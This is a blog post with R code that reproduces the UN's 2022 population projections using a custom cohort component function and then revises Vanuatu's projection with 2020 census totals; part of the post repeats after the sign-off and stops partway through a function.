First, downloading all the data. The UN recommend bulk downloads of their CSV files. For my purposes I first need the fertility, mortality and population by sex and single-year age groups. Of the original population data I am only going to use the 2020 year, and then project it forward myself based on fertility, mortality and migration; but I want the full set for comparison purposes. For migration, I couldn’t see in my hasty look at the UN site a dataset of migration projections by age and sex, so I just use the much simpler net migration rate (per thousand people) per year in the projection period. Here’s code to download all this UN data:

library(tidyverse)
library(glue)
library(scales)
library(patchwork)

dir.create("data-pop-proj-2022", showWarnings = FALSE)

#------------------download and import data for all countries from existing projections----------------
list.files("data-pop-proj-2022")

files <- c("WPP2022_Fertility_by_Age1.zip",
           "WPP2022_DeathsBySingleAgeSex_Medium_1950-2021.zip",
           "WPP2022_DeathsBySingleAgeSex_Medium_2022-2100.zip",
           "WPP2022_Population1JanuaryBySingleAgeSex_Medium_1950-2021.zip",
           "WPP2022_Population1JanuaryBySingleAgeSex_Medium_2022-2100.zip",
           "WPP2022_Demographic_Indicators_Medium.zip"
           )

# let downloads take up to 10 minutes rather than 1 minute max, as files are
# large (largest is fertility for single age, 78MB)
options(timeout=600)

if(!file.exists("data-pop-proj-2022/WPP2022_Demographic_Indicators_Medium.csv")){
  # download the zip files:
  for(i in 1:length(files)){
    download.file(glue("https://population.un.org/wpp/Download/Files/1_Indicators%20(Standard)/CSV_FILES/{files[i]}"),
                   destfile = glue("data-pop-proj-2022/{files[i]}"), mode = "wb")
  }
  
  # unzip them
  for(i in 1:length(files)){
    unzip(glue("data-pop-proj-2022/{files[i]}"), exdir = "data-pop-proj-2022")
  }
}

fert_all    <- read_csv("data-pop-proj-2022/WPP2022_Fertility_by_Age1.csv")
mort_past   <- read_csv("data-pop-proj-2022/WPP2022_DeathsBySingleAgeSex_Medium_1950-2021.csv")
mort_future <- read_csv("data-pop-proj-2022/WPP2022_DeathsBySingleAgeSex_Medium_2022-2100.csv")
pop_past    <- read_csv("data-pop-proj-2022/WPP2022_Population1JanuaryBySingleAgeSex_Medium_1950-2021.csv")
pop_future  <- read_csv("data-pop-proj-2022/WPP2022_Population1JanuaryBySingleAgeSex_Medium_2022-2100.csv")
indicators  <- read_csv("data-pop-proj-2022/WPP2022_Demographic_Indicators_Medium.csv")

mort_all <- rbind(mort_past, mort_future)
pop_all <- rbind(pop_past, pop_future)

# clean up
rm(mort_past, mort_future, pop_past, pop_future)

Next, I wrote my own cohort component population projection function. I wanted to do this from scratch rather than using an existing demography package to make sure I understood what was happening (I’m not a demographer) and could make tweaks as necessary to match the UN approach. I used this tutorial by Farid Flici as my starting point; abstracted his code into a function for easy use with multiple countries, and added a net migration component.

Because migrants’ ages tend to be dissimilar from those of the country they are migrating to (they are more likely to be in the prime of their working / family life, I believe), I needed a way to set the ages of migrants. In the function below I defaulted to a normal distribution of ages, mean 28 and standard deviation 11, which worked well to get similar results to the UN in a few countries I tried. This was the hardest and most discretionary part of the exercise.
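To illustrate how such age weights spread a net migration total across ages, here is a minimal standalone sketch. The net inflow of 1,000 people and the variable names are hypothetical; only the normal distribution with mean 28 and standard deviation 11 comes from the text.

```r
ages <- 0:120

# Relative weights from a normal density, rescaled so they sum to one
age_weights <- dnorm(ages, mean = 28, sd = 11)
age_shares  <- age_weights / sum(age_weights)

# Hypothetical net inflow of 1,000 people in one year, split evenly by sex
net_migrants <- 1000
female_share <- 0.5

mig_f <- net_migrants * female_share * age_shares
mig_m <- net_migrants * (1 - female_share) * age_shares

sum(mig_f) + sum(mig_m)       # adds back up to net_migrants
ages[which.max(age_shares)]   # the most common migrant age is the mean, 28
```

Rescaling by the sum of the weights means the part of the bell curve that would fall below age zero is simply redistributed over the valid ages, so the total number of migrants is preserved.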

My observation is that demographers seem to think in terms of matrices of numbers rather than database-oriented tidy data, and I have kept that matrix approach in this function.

#----------------------projections for one country-------------------

# adapting the implementation of the method for cohort component projection at 
# https://farid-flici.github.io/tuto.html


#' @param start_pop_m is a vector of population of males at single year age
#'   periods beginning of year starting age 0
#' @param start_pop_f as start_pop_m but for females
#' @param start_year first year ie the year for which the actual population
#'   number refers to
#' @param end_year end year for the population projection
#' @param fertility a matrix with rows for female agegroups 15 to 49 and a
#'   column for each year, values are births per woman (not per thousand women)
#'   that year and age. Must have 35 rows and number of columns equal to
#'   end_year minus start_year plus one.
#' @param mort_m a matrix with rows for age 0 to at least 50 and columns for
#'   each year, for males. Must have number of columns equal to end_year minus
#'   start_year plus one.
#' @param mort_f as mort_m but for females. Must have same number of rows and
#'   columns as mort_m.
#' @param sex_ratio_birth number of boys born for every girl born, vector with
#'   length of years to be projected.
#' @param net_migration vector of proportions of the population that migrate to
#'   the country, net of those who leave. Defaults to a vector of zeroes.
#' @param female_share_migration vector of proportions of net migrants that are
#'   female. Defaults to a vector of 0.5s.
#' @param migration_age_weights vector of relative distribution of the age of
#'   net migrants. Must be 121 values representing relative proportion of net
#'   migrants aged zero to 120. Defaults to a normal distribution of mean 28 and
#'   standard deviation 11. Note that this distribution currently must be the
#'   same through the projection period (unlike eg fertility and mortality,
#'   which have individual values for each age group and sex for each year).
#'   Only the total net migration proportion can change over time, not its age
#'   make-up.
#' @author Peter Ellis, expanding on a less-featured example by Farid Flici
#'   https://farid-flici.github.io/tuto.html
pop_proj <- function(start_pop_m, 
                     start_pop_f, 
                     start_year, 
                     end_year, 
                     fertility, 
                     mort_m,
                     mort_f,
                     sex_ratio_birth = rep(1.045, end_year - start_year + 1),
                     net_migration = rep(0, end_year - start_year + 1),
                     female_share_migration = rep(0.5, end_year - start_year + 1),
                     migration_age_weights = dnorm(0:120, mean = 28, sd = 11)
                     ){
  
  stopifnot(nrow(fertility) == 35)
  stopifnot(length(migration_age_weights) == 121)
  
  ncols <- end_year - start_year + 1
  
  stopifnot(ncol(fertility) == ncols)
  stopifnot(ncol(mort_m) == ncols)
  stopifnot(ncol(mort_f) == ncols)
  stopifnot(length(start_pop_m) > 50)
  stopifnot(length(start_pop_m) < 120)
  stopifnot(length(start_pop_f) > 50)
  stopifnot(length(start_pop_f) < 120)
  stopifnot(length(net_migration) == ncols)
  stopifnot(length(sex_ratio_birth) == ncols)
  stopifnot(length(female_share_migration) == ncols)
  stopifnot(min(female_share_migration) >= 0)
  stopifnot(max(female_share_migration) <= 1)
  
  stopifnot(nrow(mort_m) == nrow(mort_f))
  
  # fill in with high probability of death for ages beyond where we have mortality data
  if(nrow(mort_m) < 121){
    extra_deaths_m <- matrix(max(mort_m), nrow = 121 - nrow(mort_m), ncol = ncol(mort_m))
    extra_deaths_f <- matrix(max(mort_f), nrow = 121 - nrow(mort_f), ncol = ncol(mort_f))
    
    mort_m <- rbind(mort_m, extra_deaths_m)
    mort_f <- rbind(mort_f, extra_deaths_f)
  }
  
  # Create matrices for male and female population for the full projections
  # each row of the matrix is an age group, each column is a year
  PopM <- matrix(0, nrow=121, ncol = ncols)
  PopF <- matrix(0, nrow=121, ncol = ncols)
  deaths <- rep(NA, ncols)
  
  rownames(PopF) <- rownames(PopM) <- c(0:120)                # ages
  colnames(PopF) <- colnames(PopM) <- c(start_year:end_year)  # years
  
  # first year gets populated with the actual population numbers that we have:
  PopM[1:length(start_pop_m), 1] <- start_pop_m
  PopF[1:length(start_pop_f), 1] <- start_pop_f
  
  # subsequent years get modified by people aging one year, deaths, births, and net migration
  for (i in 2 : ncols) {
    
    # Age one and above:
    PopM[2:121, i] <- PopM[1:120, i-1] * (1 - mort_m[1:120, i-1])
    PopF[2:121, i] <- PopF[1:120, i-1] * (1 - mort_f[1:120, i-1])
    
    deaths[i-1] <- sum(PopM[, i-1]) - sum(PopM[, i]) + sum(PopF[, i-1]) - sum(PopF[, i])
    
    
    # migration. 
    total_migrants <- (sum(PopM[,i]) + sum(PopF[,i])) * net_migration[i]
    migf = total_migrants * female_share_migration[i] * migration_age_weights / sum(migration_age_weights)
    migm = total_migrants * (1 - female_share_migration[i]) * migration_age_weights / sum(migration_age_weights)
    
    PopM[, i] <- PopM[, i] + migm
    PopF[, i] <- PopF[, i] + migf
    
    
    # Age zero ie births. Fertility rate by the number of women in the middle of the previous year.
    # Note that PopF rows 16:50 equates to women age 15:49
    reproducing_women <- (PopF[16:50, i-1] + PopF[16:50, i]) / 2
    
    prop_boys <- sex_ratio_birth[i] / (1 + sex_ratio_birth[i])          
    prop_girls <- 1 - prop_boys
    
    PopM[1, i] <-  reproducing_women %*% fertility[, i-1] * prop_boys
    
    PopF[1, i] <- reproducing_women %*% fertility[, i-1] * prop_girls 

  }
  
  # Return a list of the two population matrices and the vector of deaths
  return(list(
    PopM = PopM,
    PopF = PopF,
    deaths = deaths
  ))
}
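To make the core of that loop concrete, here is a minimal sketch of a single projection step for females only, on a made-up population with just five single-year ages. All the numbers are invented for illustration and migration is left out; it mirrors the ageing, survival and birth steps of pop_proj() rather than replacing it.

```r
# Invented toy inputs: females only, ages 0 to 4 (not real data)
pop_prev  <- c(100, 90, 80, 70, 60)           # women at start of year, by age
mort      <- c(0.05, 0.01, 0.01, 0.02, 0.10)  # probability of dying during the year
fert      <- c(0, 0, 0.2, 0.3, 0)             # births per woman during the year
sex_ratio <- 1.045                            # boys born per girl born

n <- length(pop_prev)
pop_next <- numeric(n)

# Survivors move up one year of age; the oldest group drops out of the toy model
pop_next[2:n] <- pop_prev[1:(n - 1)] * (1 - mort[1:(n - 1)])

# Women exposed to fertility: average of start-of-year and end-of-year numbers
women_mid <- (pop_prev + pop_next) / 2
births <- sum(women_mid * fert)

# Split births by sex; only girls enter this female-only toy population
prop_girls <- 1 / (1 + sex_ratio)
pop_next[1] <- births * prop_girls

# Deaths, counting everyone in the oldest age group as leaving the population
deaths <- sum(pop_prev) - sum(pop_next[2:n])
```

In the full function the same steps run on 121 ages for each sex and each year, with fertility applied only to the rows for ages 15 to 49.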

Next, I wrote a function to extract the necessary fertility, mortality, migration rates and 2020 starting population from the UN data, feed them into my pop_proj() function and return the result. Unlike pop_proj(), which is reasonably portable, this function is very much specific to this particular project and is really just a convenience function for grabbing the data and turning it into the right units and shapes (vectors and matrices) needed for pop_proj().

repeat_un_proj <- function(the_country, the_years = 2020:2100){
  
  if(!the_country %in% unique(indicators$Location)){
    stop("Country not found")
  }
  
  this_fert <- fert_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    # Age-Specific Fertility rate
    select(Time, AgeGrp, ASFR) |>
    mutate(Time = as.character(Time),
           # turn into proportions, not rates per 1000:
           ASFR = ASFR / 1000) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = ASFR) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # should be 35 rows ie fertilities for ages 15 to 49
  stopifnot(nrow(this_fert) == 35)
  # should be 81 columns, 1 column for each year from 2020 to 2100
  stopifnot(ncol(this_fert) == length(the_years))
  
  
  # Mortality is in numbers not a ratio so we need to join to the population data to turn it into a ratio
  pop_years <- pop_all |>
    filter(Location == the_country & Variant == "Medium" & Time %in% the_years) |>
    select(Time, PopMale, PopFemale, AgeGrp)

  this_mort <- mort_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    left_join(pop_years, by = c("Time", "AgeGrp")) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    ))
  
    
    
  this_mort_m <- this_mort |>
    # sometimes more deaths than people (eg 1 death, 0 people) so cap the death ratio at 1
    mutate(DeathMale = pmin(1, DeathMale / PopMale)) |>
    select(Time, AgeGrp, DeathMale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathMale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  this_mort_f <- this_mort |>
    mutate(DeathFemale = pmin(1, DeathFemale / PopFemale)) |>
    select(Time, AgeGrp, DeathFemale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathFemale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # check the years are correct, didn't get mangled or reordered
  stopifnot(all(colnames(this_mort_f) == the_years))
  stopifnot(all(colnames(this_mort_m) == the_years))
  
  this_pop <- pop_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time == min(the_years)) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    )) |>
    arrange(AgeGrp) 
  
  # convert to units, not thousands of people:
  this_pop_m <- this_pop$PopMale * 1000
  this_pop_f <- this_pop$PopFemale * 1000
  
  # reality check
  # Population in millions; should be about 0.3 if the_country is Vanuatu, about 1400 if India:
  (sum(this_pop_m) + sum(this_pop_f) ) / 1e6
  
  # net migration
  this_cnmr <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(CNMR) / 1000
  
  # sex ratio at birth
  this_srb <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(SRB) / 100
  
  this_proj <- pop_proj(
                  start_pop_m = this_pop_m, 
                  start_pop_f = this_pop_f, 
                  start_year = min(the_years), 
                  end_year = max(the_years), 
                  fertility = this_fert, 
                  mort_m = this_mort_m,
                  mort_f = this_mort_f,
                  net_migration = this_cnmr,
                  sex_ratio_birth = this_srb
    
  )
  return(list(un_proj = this_proj,
         un_pop_m = this_pop_m,
         un_pop_f = this_pop_f,
         un_fert = this_fert,
         un_mort_m = this_mort_m,
         un_mort_f = this_mort_f,
         un_cnmr = this_cnmr,
         un_srb = this_srb))
}
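The capping of the death ratio at 1 in the function above relies on how R handles division by zero. The sketch below uses invented counts to show the behaviour; the `safe_ratio` step is one possible way to treat the 0/0 case and is an assumption, not part of the original function. Whether that case arises in the UN data is not established here.

```r
# Invented counts for three age groups (not real data)
deaths_n <- c(5, 1, 0)
pop_n    <- c(1000, 0, 0)

raw_ratio    <- deaths_n / pop_n     # finite, Inf (1/0) and NaN (0/0)
capped_ratio <- pmin(1, raw_ratio)   # Inf is capped at 1; 0/0 stays missing

# One possible way to handle 0/0: treat an empty age group as zero mortality
safe_ratio <- ifelse(pop_n == 0 & deaths_n == 0, 0, capped_ratio)
```

A missing mortality value would propagate through the projection, so it may be worth checking the mortality matrices with anyNA() before passing them on.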

Note that this function returns, in addition to the results of the population projection, the various inputs in their correct units and shape. This will be useful later when we want to modify some of those inputs.
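The reshaping from long "tidy" data to an age-by-year matrix is the step that repeats for fertility and for each sex's mortality. A minimal sketch of that pattern on invented data follows; the column names match those used above, but the values and the object names `long_fert` and `fert_matrix` are made up.

```r
library(dplyr)
library(tidyr)

# Invented long-format data: 3 ages by 2 years, rates per 1000 women
long_fert <- tibble(
  Time   = rep(2020:2021, each = 3),
  AgeGrp = rep(15:17, times = 2),
  ASFR   = c(10, 20, 30, 11, 21, 31)
)

fert_matrix <- long_fert |>
  # year becomes a column name; rates become births per woman
  mutate(Time = as.character(Time), ASFR = ASFR / 1000) |>
  pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = ASFR) |>
  arrange(AgeGrp) |>
  select(-AgeGrp) |>
  as.matrix()

dim(fert_matrix)       # rows are ages, columns are years
colnames(fert_matrix)
```

Sorting by age before dropping the age column matters, because after that point the matrix rows are identified only by their position.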

Now that we’ve got these functions, using them to do projections from 2020 and compare those projections to the published numbers is pretty straightforward. Here’s the code to do that for Vanuatu, which produces the first chart at the top of this blog post:

the_country <- "Vanuatu"
my_proj <- repeat_un_proj(the_country)$un_proj

# total population
comp_data <- indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = TPopulation1Jan) |>
  mutate(`Reproduction` = as.numeric(apply(my_proj$PopM, 2, sum) + apply(my_proj$PopF, 2, sum)) / 1000) 

# First year should be an exact match:
stopifnot(comp_data[1, ]$`UN original` == comp_data[1, ]$Reproduction)


comp_data |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  scale_y_continuous(label = comma) +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")
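One caveat on the exact-match check with `==` in the code above: comparing floating point numbers for strict equality can fail for reasons unrelated to the demography. A tolerance-based comparison such as base R's all.equal() is a common alternative. The sketch below uses generic numbers, not the projection output.

```r
a <- 0.1 + 0.2
b <- 0.3

a == b                    # FALSE on typical IEEE 754 double arithmetic
isTRUE(all.equal(a, b))   # TRUE: equal within a small tolerance

# A tolerance-based version of an exact-match assertion
stopifnot(isTRUE(all.equal(a, b)))
```

all.equal() returns a character description rather than FALSE when values differ, which is why it is wrapped in isTRUE().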

As we can see, the results are pretty much identical. Let’s look at my projected births and deaths based on fertility and mortality rates, and compare them to the published projected numbers:

# births
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Births) |>
  mutate(Reproduction = as.numeric(my_proj$PopM[1,] + my_proj$PopF[1, ]) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Births (thousands)", x = "", colour = "")

# deaths
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Deaths) |>
  mutate(Reproduction = as.numeric(my_proj$deaths) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Deaths (thousands)", x = "", colour = "")

I’m pretty happy with those. There are definitely some discrepancies and a lag in the births, which I suspect come down to how one treats populations of mothers - numbers on 1 January v 1 July, that sort of thing. But in the scheme of things these are very small.

Now, Vanuatu is relatively easy because the UN assumed net zero migration in the projection period. We can see this by comparing the net migration rates in their Indicators dataset for a few countries, with this code:

plot_mig <- function(the_country){
  p <- indicators |>
    filter(Location == the_country) |>
    ggplot(aes(x = Time, y = CNMR)) +
    geom_vline(xintercept = 2022, lty = 2, colour = "steelblue") +
    geom_hline(yintercept = 0, lty = 2, colour = "steelblue") +
    geom_line() +
    labs(title = the_country,
         subtitle = "Net migration rate per thousand people",
         y = "", x = "",
         caption = "Source: UN World Population Prospects 2022")
  
  return(p)
}

plot_mig("Vanuatu") + plot_mig("Fiji") + 
  plot_mig("Australia") + plot_mig("India") +
  plot_layout(ncol = 2)

For countries that have good data on it, migration is a big deal in the projections; but forecasting is hard, particularly of the future.

My first few goes at reproducing the projections for Australia and India tended to be badly out because I had added in net migration evenly across the whole age distribution. My eventual solution, making net migration bell curved with an average age of 28, is a bit of a hack with the parameters chosen to make Australia’s projections come out right. A better method would definitely be to use actual age-specific net migration forecasts. Whether such things are possible will very much depend on the country; it’s probably possible for Australia, but not for most of the countries I work with.

Here’s the final result comparing UN projections with mine for a few interesting countries:

Adjusting the starting point

Now, the whole point of this exercise was to see if we can plausibly adjust the starting point - say the population totals in 2020, or the forecast fertility rates - and say we are building on the UN’s projections to get our own. Here’s my rough demo of how we might do that, again using the case of Vanuatu. Vanuatu’s 2020 census wasn’t available at the time of the UN’s 2022 population projections, so the actual population and fertility numbers for 2020 differ somewhat (of course) from what was projected.

For the below, I am relying on the analytical report of the Vanuatu census. On a quick glance I didn’t see a table of the actual total population by single year age and sex, so I just adjusted the UN’s projected totals by a factor to make them add up to the correct 2020 total males and females. Of course if we were doing this for real we’d get the real numbers straight from the census; I actually can do this easily enough at work but obviously for this blog wanted to use only easily accessible public data.
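The proportional adjustment described above keeps the age profile of the UN figures and only changes the total. A minimal sketch on invented numbers (the vector `un_pop` and the value of `census_total` are hypothetical):

```r
# Invented population by age for one sex (not real data)
un_pop <- c(400, 350, 250)
census_total <- 1100   # hypothetical census total for that sex

# Scale every age group by the same factor so the total matches the census
revised_pop <- un_pop * census_total / sum(un_pop)

sum(revised_pop)                 # matches census_total
revised_pop / sum(revised_pop)   # age shares are the same as in un_pop
```

The cost of this shortcut is that any difference in age structure between the census and the UN estimate is ignored.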

#-----------------changing one or two factors while keeping the rest the same--------------

# Say we had the 2020 Vanuatu census so we knew the real population then, and wanted
# to redo the population projections with everything staying as they were before


# file:///C:/Users/Peter/Downloads/Vanuatu_2020_Census_Analytical_report_Vol_2.pdf
revision_country <- "Vanuatu"
van_orig <- repeat_un_proj(revision_country)

# rough adjustment of starting population in 2020 to make totals match the Census totals.
# In principle could of course use the actual numbers by single age category.
revised_pop_m <- van_orig$un_pop_m * 151597 / sum(van_orig$un_pop_m)
revised_pop_f <- van_orig$un_pop_f * 148422 / sum(van_orig$un_pop_f)

# calculate the crude birth rate in the current projection
un_cbr_2020 <- (van_orig$un_proj$PopM[1, 2]  + van_orig$un_proj$PopF[1, 2]) / 
  sum(van_orig$un_proj$PopM[, 2], van_orig$un_proj$PopF[, 2]) * 1000

# make a rough adjustment of future fertility rates assuming they are "out" by the
# same proportion that crude birth rate was out in 2020
adj_ratio <- 28.2 / un_cbr_2020
revised_fert <- van_orig$un_fert * adj_ratio

# Refit the projection with the above rough adjustments:
revised_proj <- pop_proj(
  start_pop_m = revised_pop_m,
  start_pop_f = revised_pop_f,
  start_year = 2020,
  end_year = 2100,
  fertility = revised_fert,
  mort_m = van_orig$un_mort_m,
  mort_f = van_orig$un_mort_f,
  sex_ratio_birth = van_orig$un_srb,
  net_migration = van_orig$un_cnmr)


projected_pop <- apply(revised_proj$PopM, 2, sum) + apply(revised_proj$PopF, 2, sum)

#-----------------Compare total population----------------
comp_data <- indicators |>
  filter(Location == revision_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `2022 UN projections` = TPopulation1Jan) |>
  mutate(`Revised with 2020 census` = as.numeric(projected_pop / 1000) )


p5 <- comp_data |>
  filter(Time <= 2050) |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = revision_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

#--------------Compare population pyramids-------------------------
d <- tibble(value = c( revised_proj$PopM[, 31], revised_proj$PopF[, 31],   
                  van_orig$un_proj$PopM[, 31],  van_orig$un_proj$PopF[, 31]),
       sex = rep(c("Male", "Female", "Male", "Female"), each = 121),
       model = rep(c("Revised projections with 2020 census, made in 2024", "UN projections, made in 2022"), each = 242),
       age = rep(0:120, 4)) |>
  mutate(agef = fct_reorder(as.character(age), age),
         model = fct_rev(model)) |>
  filter(age < 100)

d |>
  filter(sex == "Female") |>
  ggplot(aes(x = value, y = agef)) +
  facet_wrap(~model) +
  geom_col(fill = "brown", colour = NA) +
  geom_col(data = filter(d, sex == "Male"), aes(x = -value), fill = "orange", colour = NA) +
  geom_vline(xintercept = 0, colour = "white") +
  labs(x = "Number of people", y = "",
       title = "Comparison of UN original and revised population projections",
       subtitle = "Population age distribution in 2050") +
  scale_x_continuous(breaks = c(-4000, -2000, 0, 2000, 4000), labels = c("4,000", "Male", 0, "Female", "4,000")) +
  theme(panel.grid = element_blank()) +
  scale_y_discrete(breaks = 1:20 * 5)

And that’s what gets us these results:

I’m hoping this might be actually useful for pragmatic updates of the UN population projections when more current data is available, without having to revise everything from scratch.

OK, that’s all for today.


Reproducing and adapting the UN Population Projections by @ellis2013nz

free range statistics - R — Sun, 05 May 2024 00:00:00 +0000

My observation is that demographers seem to think in terms of matrices of numbers rather than database-oriented tidy data, and I have kept that matrix approach in this function.

#----------------------projections for one country-------------------

# adapting the implementation of the method for cohort component projection at 
# https://farid-flici.github.io/tuto.html


#' @param start_pop_m is a vector of population of males at single year age
#'   periods beginning of year starting age 0
#' @param start_pop_f as start_pop_m but for females
#' @param start_year first year ie the year for which the actual population
#'   number refers to
#' @param end_year end year for the population projection
#' @param fertility a matrix with rows for female agegroups 15 to 49 and a
#'   column for each year, values are births per woman (not per thousand women)
#'   that year and age. Must have 35 rows and number of columns equal to
#'   end_year minus start_year plus one.
#' @param mort_m a matrix with rows for age 0 to at least 50 and columns for
#'   each year, for males. Must have number of columns equal to end_year minus
#'   start_year plus one.
#' @param mort_f as mort_m but for females. Must have same number of rows and
#'   columns as mort_m.
#' @param sex_ratio_birth number of boys born for every girl born, vector with
#'   length of years to be projected.
#' @param net_migration vector of proportions of the population that migrate to
#'   the country, net of those who leave. Defaults to a vector of zeroes.
#' @param female_share_migration vector of proportions of net migrants that are
#'   female. Defaults to a vector of 0.5s.
#' @param migration_age_weights vector of relative distribution of the age of
#'   net migrants. Must be 121 values representing relative proportion of net
#'   migrants aged zero to 120. Defaults to a normal distribution of mean 28 and
#'   standard deviation 11. Note that this distribution currently must be the
#'   same through the projection period (unlike eg fertility and mortality,
#'   which have individual values for each age group and sex for each year).
#'   Only the total net migration proportion can change over time, not its age
#'   make-up.
#' @author Peter Ellis, expanding on a less-featured example by Farid Flici
#'   https://farid-flici.github.io/tuto.html
pop_proj <- function(start_pop_m, 
                     start_pop_f, 
                     start_year, 
                     end_year, 
                     fertility, 
                     mort_m,
                     mort_f,
                     sex_ratio_birth = rep(1.045, end_year - start_year + 1),
                     net_migration = rep(0, end_year - start_year + 1),
                     female_share_migration = rep(0.5, end_year - start_year + 1),
                     migration_age_weights = dnorm(0:120, mean = 28, sd = 11)
                     ){
  
  stopifnot(nrow(fertility) == 35)
  stopifnot(length(migration_age_weights) == 121)
  
  ncols <- end_year - start_year + 1
  
  stopifnot(ncol(fertility) == ncols)
  stopifnot(ncol(mort_m) == ncols)
  stopifnot(ncol(mort_f) == ncols)
  stopifnot(length(start_pop_m) > 50)
  stopifnot(length(start_pop_m) < 120)
  stopifnot(length(start_pop_f) > 50)
  stopifnot(length(start_pop_f) < 120)
  stopifnot(length(net_migration) == ncols)
  stopifnot(length(sex_ratio_birth) == ncols)
  stopifnot(length(female_share_migration) == ncols)
  stopifnot(min(female_share_migration) >= 0)
  stopifnot(max(female_share_migration) <= 1)
  
  stopifnot(nrow(mort_m) == nrow(mort_f))
  
  # fill in with high probability of death for ages beyond where we have mortality data
  if(nrow(mort_m) < 121){
    extra_deaths_m <- matrix(max(mort_m), nrow = 121 - nrow(mort_m), ncol = ncol(mort_m))
    extra_deaths_f <- matrix(max(mort_f), nrow = 121 - nrow(mort_f), ncol = ncol(mort_f))
    
    mort_m <- rbind(mort_m, extra_deaths_m)
    mort_f <- rbind(mort_f, extra_deaths_f)
  }
  
  # Create matrices for male and female population for the full projections
  # each row of the matrix is an age group, each column is a year
  PopM <- matrix(0, nrow=121, ncol = ncols)
  PopF <- matrix(0, nrow=121, ncol = ncols)
  deaths <- rep(NA, ncols)
  
  rownames(PopF) <- rownames(PopM) <- c(0:120)                # ages
  colnames(PopF) <- colnames(PopM) <- c(start_year:end_year)  # years
  
  # first year gets populated with the actual population numbers that we have:
  PopM[1:length(start_pop_m), 1] <- start_pop_m
  PopF[1:length(start_pop_f), 1] <- start_pop_f
  
  # subsequent years get modified by people aging one year, deaths, births, and net migration
  for (i in 2 : ncols) {
    
    # Age one and above:
    PopM[2:121, i] <- PopM[1:120, i-1] * (1 - mort_m[1:120, i-1])
    PopF[2:121, i] <- PopF[1:120, i-1] * (1 - mort_f[1:120, i-1])
    
    deaths[i-1] <- sum(PopM[, i-1]) - sum(PopM[, i]) + sum(PopF[, i-1]) - sum(PopF[, i])
    
    
    # migration. 
    total_migrants <- (sum(PopM[,i]) + sum(PopF[,i])) * net_migration[i]
    migf = total_migrants * female_share_migration[i] * migration_age_weights / sum(migration_age_weights)
    migm = total_migrants * (1 - female_share_migration[i]) * migration_age_weights / sum(migration_age_weights)
    
    PopM[, i] <- PopM[, i] + migm
    PopF[, i] <- PopF[, i] + migf
    
    
    # Age zero ie births. Fertility rate by the number of women in the middle of the previous year.
    # Note that PopF rows 16:50 equates to women age 15:49
    reproducing_women <- (PopF[16:50, i-1] + PopF[16:50, i]) / 2
    
    prop_boys <- sex_ratio_birth[i] / (1 + sex_ratio_birth[i])          
    prop_girls <- 1 - prop_boys
    
    PopM[1, i] <-  reproducing_women %*% fertility[, i-1] * prop_boys
    
    PopF[1, i] <- reproducing_women %*% fertility[, i-1] * prop_girls 

  }
  
  # Return a list of the two matrices
  return(list(
    PopM = PopM,
    PopF = PopF,
    deaths = deaths
  ))
}

repeat_un_proj <- function(the_country, the_years = 2020:2100){
  
  if(!the_country %in% unique(indicators$Location)){
    stop("Country not found")
  }
  
  this_fert <- fert_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    # Age-Specific Fertility rate
    select(Time, AgeGrp, ASFR) |>
    mutate(Time = as.character(Time),
           # turn into proportions, not rates per 1000:
           ASFR = ASFR / 1000) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = ASFR) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # should be 35 rows ie fertilities for ages 15 to 49
  stopifnot(nrow(this_fert) == 35)
  # should be 81 columns, 1 column for each year from 2020 to 2100
  stopifnot(ncol(this_fert) == length(the_years))
  
  
  # Mortality is in numbers not a ratio so we need to join to the population data to turn it into a ratio
  pop_years <- pop_all |>
    filter(Location == the_country & Variant == "Medium" & Time %in% the_years) |>
    select(Time, PopMale, PopFemale, AgeGrp)

  this_mort <- mort_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    left_join(pop_years, by = c("Time", "AgeGrp")) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
